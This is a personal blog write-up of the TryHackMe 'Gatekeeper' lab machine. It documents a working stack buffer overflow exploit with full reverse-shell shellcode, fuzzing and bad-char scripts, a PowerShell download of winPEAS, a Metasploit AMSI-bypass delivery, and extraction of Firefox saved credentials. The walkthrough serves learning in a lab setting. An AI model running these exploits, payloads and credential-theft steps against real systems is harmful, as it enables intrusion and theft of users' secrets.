u915

Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Gatekeeper

Writeup about the Tryhackme machine Gatekeeper.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick scan

nmap -p- --open -T5 -v 10.10😄 -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:50 CEST
Initiating Connect Scan at 18:50
Scanning 10.10😄 [65535 ports]
Discovered open port 135/tcp on 10.10😄
Discovered open port 3389/tcp on 10.10😄
Discovered open port 445/tcp on 10.10😄
Discovered open port 139/tcp on 10.10😄
Connect Scan Timing: About 23.57% done; ETC: 18:52 (0:01:41 remaining)
Discovered open port 49152/tcp on 10.10😄
Discovered open port 49153/tcp on 10.10😄
Connect Scan Timing: About 44.58% done; ETC: 18:52 (0:01:16 remaining)
Connect Scan Timing: About 66.59% done; ETC: 18:52 (0:00:46 remaining)
Discovered open port 31337/tcp on 10.10😄
Completed Connect Scan at 18:52, 154.43s elapsed (65535 total ports)
Nmap scan report for 10.10😄
Host is up (0.066s latency).
Not shown: 38084 filtered ports, 27444 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.60 seconds


Strange service on port 31337, Elite?

Nmap deep scan

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10😄 -oN full_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:54 CEST
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 57.14% done; ETC: 18:55 (0:00:12 remaining)
Nmap scan report for 10.10😄
Host is up (0.049s latency).

PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2021-07-03T16:47:05
|_Not valid after:  2022-01-02T16:47:05
|_ssl-date: 2021-07-04T16:57:01+00:00; -37s from scanner time.
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.91%I=7%D=7/4%Time=60E1E7EA%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(
SF:SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\x20V
SF:ia:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:nm@nm
SF:>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-ID:\
SF:x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-Forwa
SF:rds:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact:\
SF:x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\x2
SF:0\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HTTP
SF:Options,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")
SF:%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x20\r
SF:!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20\x
SF:16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSessi
SF:onReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Four
SF:OhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2ebak
SF:\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01def
SF:ault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n");
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m22s, deviation: 2h00m00s, median: -37s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d6:c1:42:81:9f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-04T12:56:55-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-04T16:56:55
|_  start_date: 2021-07-04T16:46:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.30 seconds

Interesting: the guest account is enabled (account_used: guest).

Basic interaction with the service on port 31337:

nc 10.10😄 31337

Hello !!!

Hello !!!

Hello !!!
Darkness
Hello Darkness!!!

Looks like the service just echoes back whatever you send it; this could be a vector for a buffer overflow.

Manual enumeration of SMB on port 445:

smbclient --no-pass -L //10.10😄    1 ⨯

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
SMB1 disabled -- no workgroup available

Downloaded some interesting files from the Users share:

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 262144 as NTUSER.DAT (299,4 KiloBytes/sec) (average 106,0 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG
getting file \Default\NTUSER.DAT.LOG of size 1024 as NTUSER.DAT.LOG (6,8 KiloBytes/sec) (average 100,6 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG1
getting file \Default\NTUSER.DAT.LOG1 of size 189440 as NTUSER.DAT.LOG1 (362,7 KiloBytes/sec) (average 142,4 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG2
getting file \Default\NTUSER.DAT.LOG2 of size 0 as NTUSER.DAT.LOG2 (0,0 KiloBytes/sec) (average 135,5 KiloBytes/sec)


smb: \Share\> ls
  .                                   D        0  Fri May 15 03:58:07 2020
  ..                                  D        0  Fri May 15 03:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 07:27:17 2020

		7863807 blocks of size 4096. 3879008 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (7,7 KiloBytes/sec) (average 7,7 KiloBytes/sec)

Running strings on the binary to look for anything interesting inside:

strings gatekeeper.exe 
KERNEL32.dll
WSAStartup failed: %d
31337
getaddrinfo failed: %d
socket() failed with error: %ld
bind() failed with error: %d
listen() failed with error: %ld
[+] Listening for connections.
accept failed: %d
Received connection from remote host.
Connection handed off to handler thread.
Please send shorter lines.
Bye!
[!] recvbuf exhausted. Giving up.
Client disconnected.
recv() failed: %d.
Bytes received: %d
exit
Client requested exit.
Hello %s!!!
send failed: %d
Bytes sent: %d
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

I also ran nmap with the vuln script category to check for critical vulnerabilities. This is the trimmed output:

3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

The scan reports MS12-020, a Remote Desktop Protocol Remote Code Execution Vulnerability with a CVSSv2 score of 9.3.

The PoC can be found here:

https://www.exploit-db.com/exploits/18606

But I could not find RCE exploit code, only a simple PoC and a DoS, which is unwanted. Running the PoC gave this, nothing useful:

nc 10.10😄 3389 < 18606.dat
�4
��<����5�

Coming back to the mysterious port 31337, I created a string of 5000 chars and sent it to the server… it crashes…

2 - Vulnerability Identification

Digging into the crash generated with the 5000-char string, I started to study the executable in more detail.

I used the same Windows 7 TryHackMe machine to prepare the stack buffer overflow, with gatekeeper.exe uploaded and running:


Sending 500 chars crashed it right away, so I tuned the fuzzer to add a small number of chars per iteration:

#!/usr/bin/env python3
# fuzz1.py: send lines that grow by CHARS_FUZZ bytes per iteration until the service stops answering

from pwn import *

HOST = "10.10😄"
PORT = 31337
LIMIT = 60        # maximum number of iterations
CHARS_FUZZ = 50   # bytes added per iteration

r = remote(HOST, PORT)
for x in range(1, LIMIT):
    print("[+] SENDING" + str(CHARS_FUZZ * x) + " CHARS, COUNTER:" + str(x))
    r.send(b"A" * CHARS_FUZZ * x + b"\r\n")
    # a healthy server answers "Hello AAAA...!!!"; an empty read after the timeout
    # (or a closed connection) means the process crashed
    try:
        crashed = r.recvline(timeout=4) == b""
    except EOFError:
        crashed = True
    if crashed:
        print("[!] KO")
        r.clean()
        r.close()
        break
    r.clean()

python3 fuzz1.py
[+] Opening connection to 10.10😄 on port 31337: Done
[+] SENDING50 CHARS, COUNTER:1
[+] SENDING100 CHARS, COUNTER:2
[+] SENDING150 CHARS, COUNTER:3
[!] KO
[*] Closed connection to 10.10😄 port 31337


The server crashes with 150 chars.

3 - Exploit development

With this information I started analyzing the executable in Immunity Debugger, creating a cyclic pattern of 150 chars, the length at which the server crashes:

msf-pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

Sending the pattern with nc, EIP was overwritten with 39654138:

msf-pattern_offset -l 150 -q 39654138    1 ⨯
[*] Exact match at offset 146

So the exact offset is 146.

Setting up the Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Searching for a jmp esp (\xff\xe4) address in a module without ASLR or rebasing:

!mona modules
!mona find -s "\xff\xe4"
0x080414c3 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)
0x080416bf : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)

Converting the second one to little-endian:

080416bf -> “\xbf\x16\x04\x08”

Generating the bytearray without \x00 with Mona:

!mona bytearray -cpb \x00

Testing for bad chars with the following Python script:

#!/usr/bin/env python3
# badchars.py: fill the buffer up to EIP, overwrite EIP with BBBB and place every byte
# except the known bad ones right after it, so they can be compared in memory

from pwn import *

HOST = "10.10😄"
PORT = 31337
offset = 146
fuzz = b"A" * offset
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
            b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
            b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
            b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
            b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
r = remote(HOST, PORT)

print("[+] SENDING")
r.send(fuzz + b"BBBB" + badchars + b"\r\n")
# the process is expected to crash here; an empty read after the timeout confirms it
if r.recvline(timeout=4) == b"":
    print("[!] KO")
    r.clean()
    r.close()

Then comparing the bytes that landed on the stack (at 0012FEB8) against the generated array in Mona:

!mona compare -a 0012FEB8 -f C:\Users\admin\Desktop\gatekeeper\bytearray.bin

The first compare reports that \x01 is also a bad char, so I generated the bytearray again:

!mona bytearray -cpb \x00\x01

The next compare reports \x0a as a bad char too; repeating the process excluding \x0a as well gives a clean compare, so no more bad chars are required. The final bad char list is \x00\x01\x0a. Using it with msfvenom to generate a payload:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10😄 LPORT=4433 -f c -v shellcode -b '\x00\x01\x0a' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] = 
"\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x16\xa0\x5e\x04\x6a\x54\x1c"
"\xe7\x92\xa5\x41\x61\x77\x94\x41\x15\xfc\x87\x71\x5d\x50\x24"
"\xf9\x33\x40\xbf\x8f\x9b\x67\x08\x25\xfa\x46\x89\x16\x3e\xc9"
"\x09\x65\x13\x29\x33\xa6\x66\x28\x74\xdb\x8b\x78\x2d\x97\x3e"
"\x6c\x5a\xed\x82\x07\x10\xe3\x82\xf4\xe1\x02\xa2\xab\x7a\x5d"
"\x64\x4a\xae\xd5\x2d\x54\xb3\xd0\xe4\xef\x07\xae\xf6\x39\x56"
"\x4f\x54\x04\x56\xa2\xa4\x41\x51\x5d\xd3\xbb\xa1\xe0\xe4\x78"
"\xdb\x3e\x60\x9a\x7b\xb4\xd2\x46\x7d\x19\x84\x0d\x71\xd6\xc2"
"\x49\x96\xe9\x07\xe2\xa2\x62\xa6\x24\x23\x30\x8d\xe0\x6f\xe2"
"\xac\xb1\xd5\x45\xd0\xa1\xb5\x3a\x74\xaa\x58\x2e\x05\xf1\x34"
"\x83\x24\x09\xc5\x8b\x3f\x7a\xf7\x14\x94\x14\xbb\xdd\x32\xe3"
"\xbc\xf7\x83\x7b\x43\xf8\xf3\x52\x80\xac\xa3\xcc\x21\xcd\x2f"
"\x0c\xcd\x18\xff\x5c\x61\xf3\x40\x0c\xc1\xa3\x28\x46\xce\x9c"
"\x49\x69\x04\xb5\xe0\x90\xcf\xb0\xfd\x9e\x7b\xad\xff\x9e\x92"
"\x7c\x89\x78\xfe\x6e\xdf\xd3\x97\x17\x7a\xaf\x06\xd7\x50\xca"
"\x09\x53\x57\x2b\xc7\x94\x12\x3f\xb0\x54\x69\x1d\x17\x6a\x47"
"\x09\xfb\xf9\x0c\xc9\x72\xe2\x9a\x9e\xd3\xd4\xd2\x4a\xce\x4f"
"\x4d\x68\x13\x09\xb6\x28\xc8\xea\x39\xb1\x9d\x57\x1e\xa1\x5b"
"\x57\x1a\x95\x33\x0e\xf4\x43\xf2\xf8\xb6\x3d\xac\x57\x11\xa9"
"\x29\x94\xa2\xaf\x35\xf1\x54\x4f\x87\xac\x20\x70\x28\x39\xa5"
"\x09\x54\xd9\x4a\xc0\xdc\xf9\xa8\xc0\x28\x92\x74\x81\x90\xff"
"\x86\x7c\xd6\xf9\x04\x74\xa7\xfd\x15\xfd\xa2\xba\x91\xee\xde"
"\xd3\x77\x10\x4c\xd3\x5d";

Script with the msfvenom payload:

#!/usr/bin/env python3
# exploit.py: 146 bytes of padding, the jmp esp address from gatekeeper.exe in little-endian,
# a NOP sled and the encoded msfvenom payload, terminated with CRLF like a normal line

from pwn import *

HOST = "10.10😄"
PORT = 31337
offset = 146
fuzz = b"A" * offset
shellcode = (b"\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
             b"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x16\xa0\x5e\x04\x6a\x54\x1c"
             b"\xe7\x92\xa5\x41\x61\x77\x94\x41\x15\xfc\x87\x71\x5d\x50\x24"
             b"\xf9\x33\x40\xbf\x8f\x9b\x67\x08\x25\xfa\x46\x89\x16\x3e\xc9"
             b"\x09\x65\x13\x29\x33\xa6\x66\x28\x74\xdb\x8b\x78\x2d\x97\x3e"
             b"\x6c\x5a\xed\x82\x07\x10\xe3\x82\xf4\xe1\x02\xa2\xab\x7a\x5d"
             b"\x64\x4a\xae\xd5\x2d\x54\xb3\xd0\xe4\xef\x07\xae\xf6\x39\x56"
             b"\x4f\x54\x04\x56\xa2\xa4\x41\x51\x5d\xd3\xbb\xa1\xe0\xe4\x78"
             b"\xdb\x3e\x60\x9a\x7b\xb4\xd2\x46\x7d\x19\x84\x0d\x71\xd6\xc2"
             b"\x49\x96\xe9\x07\xe2\xa2\x62\xa6\x24\x23\x30\x8d\xe0\x6f\xe2"
             b"\xac\xb1\xd5\x45\xd0\xa1\xb5\x3a\x74\xaa\x58\x2e\x05\xf1\x34"
             b"\x83\x24\x09\xc5\x8b\x3f\x7a\xf7\x14\x94\x14\xbb\xdd\x32\xe3"
             b"\xbc\xf7\x83\x7b\x43\xf8\xf3\x52\x80\xac\xa3\xcc\x21\xcd\x2f"
             b"\x0c\xcd\x18\xff\x5c\x61\xf3\x40\x0c\xc1\xa3\x28\x46\xce\x9c"
             b"\x49\x69\x04\xb5\xe0\x90\xcf\xb0\xfd\x9e\x7b\xad\xff\x9e\x92"
             b"\x7c\x89\x78\xfe\x6e\xdf\xd3\x97\x17\x7a\xaf\x06\xd7\x50\xca"
             b"\x09\x53\x57\x2b\xc7\x94\x12\x3f\xb0\x54\x69\x1d\x17\x6a\x47"
             b"\x09\xfb\xf9\x0c\xc9\x72\xe2\x9a\x9e\xd3\xd4\xd2\x4a\xce\x4f"
             b"\x4d\x68\x13\x09\xb6\x28\xc8\xea\x39\xb1\x9d\x57\x1e\xa1\x5b"
             b"\x57\x1a\x95\x33\x0e\xf4\x43\xf2\xf8\xb6\x3d\xac\x57\x11\xa9"
             b"\x29\x94\xa2\xaf\x35\xf1\x54\x4f\x87\xac\x20\x70\x28\x39\xa5"
             b"\x09\x54\xd9\x4a\xc0\xdc\xf9\xa8\xc0\x28\x92\x74\x81\x90\xff"
             b"\x86\x7c\xd6\xf9\x04\x74\xa7\xfd\x15\xfd\xa2\xba\x91\xee\xde"
             b"\xd3\x77\x10\x4c\xd3\x5d")

jmp_esp = b"\xbf\x16\x04\x08"   # 0x080416bf (jmp esp in gatekeeper.exe) in little-endian
nop = b"\x90" * 20              # NOP sled in front of the decoder stub
r = remote(HOST, PORT)

print("[+] SENDING")
r.send(fuzz + jmp_esp + nop + shellcode + b"\r\n")
if r.recvline(timeout=4) == b"":
    print("[!] KO")
    r.clean()
    r.close()
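The offset and bad-char steps above (msf-pattern_create, msf-pattern_offset, the little-endian conversion of 080416bf and the Mona bytearray/compare loop) can be reproduced in plain Python. This is an added example, not the writeup's or Metasploit's own code; the `constructed_memory` function is a made-up model of the target's input handling that only serves to show the iterative compare loop ending with the page's \x00\x01\x0a list.

```python
"""Reproduce the offset and bad-character analysis from the exploit development
section in plain Python (added example, not from the writeup or Metasploit)."""
import string
import struct
from typing import Callable, Optional


def pattern_create(length: int) -> str:
    """Metasploit-style cyclic pattern: Aa0Aa1 ... Az9Ba0 ... (every 4-byte window is unique)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(length: int, eip_hex: str) -> Optional[int]:
    """Offset of the debugger's EIP value inside pattern_create(length).
    The debugger shows EIP as a number, so its bytes are reversed to little-endian
    before searching: 39654138 -> b'8Ae9'. None when the value is not in the pattern."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def little_endian(addr_hex: str) -> bytes:
    """Pack a 32-bit address as it must appear in the payload (080416bf -> bf 16 04 08)."""
    return struct.pack("<I", int(addr_hex, 16))


def bytearray_without(bad: bytes) -> bytes:
    """Same idea as '!mona bytearray -cpb <bad>': bytes 0x00-0xff minus the bad ones."""
    return bytes(b for b in range(256) if b not in bad)


def first_badchar(sent: bytes, in_memory: bytes) -> Optional[int]:
    """Same idea as '!mona compare': the first sent byte that did not survive in memory."""
    for i, b in enumerate(sent):
        if i >= len(in_memory) or in_memory[i] != b:
            return b
    return None


def find_badchars(memory_model: Callable[[bytes], bytes], known_bad: bytes = b"\x00") -> bytes:
    """Repeat the send/compare loop, excluding each bad byte found, until the compare is clean.
    memory_model(sent) stands in for reading the array back from the stack in the debugger."""
    bad = bytes(known_bad)
    while True:
        sent = bytearray_without(bad)
        b = first_badchar(sent, memory_model(sent))
        if b is None:
            return bad
        bad += bytes([b])


def constructed_memory(sent: bytes) -> bytes:
    """CONSTRUCTED model, not reverse-engineered from gatekeeper.exe: the copy stops at the
    first \x01 or \x0a, which makes the loop above find \x01 first and \x0a second, as the
    two Mona compares in the writeup did."""
    out = bytearray()
    for b in sent:
        if b in (0x01, 0x0A):
            break
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    print(pattern_create(150))
    print(pattern_offset(150, "39654138"))      # 146, as msf-pattern_offset reported
    print(little_endian("080416bf").hex(" "))   # bf 16 04 08
    print(find_badchars(constructed_memory))    # b'\x00\x01\n'
```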

It worked on the lab machine, now pointing it at the real machine:

nc -lvp 4433    1 ⨯
listening on [any] 4433 ...
10.10😄: inverse host lookup failed: Unknown host
connect to [10.10😄] from (UNKNOWN) [10.10😄] 49204
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\natbat\Desktop>whoami
whoami
gatekeeper\natbat

Getting the flag:

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
{H4lf😄}

The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!

There is also a .bat file:

C:\Users\natbat\Desktop>type gatekeeperstart.bat
type gatekeeperstart.bat
@echo off
:start 
start /w C:\Users\natbat\Desktop\gatekeeper.exe
::Wait 90 seconds before restarting.
TIMEOUT /T 5
GOTO:Start

I uploaded the .bat version of winPEAS to enumerate the Windows machine further:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10😄:7777/bat.bat','bat.bat')"


 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys



C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\places.sqlite
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\key4.db
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\winsxs\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_6f0f7833cb71e18d\appcmd.exe
C:\Windows\winsxs\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_79642285ffd2a388\appcmd.exe

I was stuck for a while… and then I decided to upgrade my reverse shell to meterpreter. I was looking around without any ideas and went back to the winPEAS output, because a Firefox profile folder is not common; I also found a post module that extracts the files from the Firefox folder:

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10😄    web_delivery - Delivering AMSI Bypass (939 bytes)
[*] 10.10😄    web_delivery - Delivering Payload (1904 bytes)
[*] Sending stage (175174 bytes) to 10.10😄
[*] Meterpreter session 13 opened (10.10😄:9990 -> 10.10😄:49249) at 2021-07-04 23:49:12 +0200


msf6 post(multi/gather/firefox_creds) > set SESSION 13
SESSION => 13
msf6 post(multi/gather/firefox_creds) > exploit

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /home/u915/.msf4/loot/20210704235048_default_10.10😄_ff.ljfn812a.cert_415838.bin
[+] Downloaded cookies.sqlite: /home/u915/.msf4/loot/20210704235049_default_10.10😄_ff.ljfn812a.cook_161103.bin
[+] Downloaded key4.db: /home/u915/.msf4/loot/20210704235050_default_10.10😄_ff.ljfn812a.key4_832146.bin
[+] Downloaded logins.json: /home/u915/.msf4/loot/20210704235051_default_10.10😄_ff.ljfn812a.logi_045138.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default

[*] Post module execution completed

Again I was hitting a wall because I did not know what to do with the Firefox files, until I discovered this:

git clone https://github.com/unode/firefox_decrypt.git

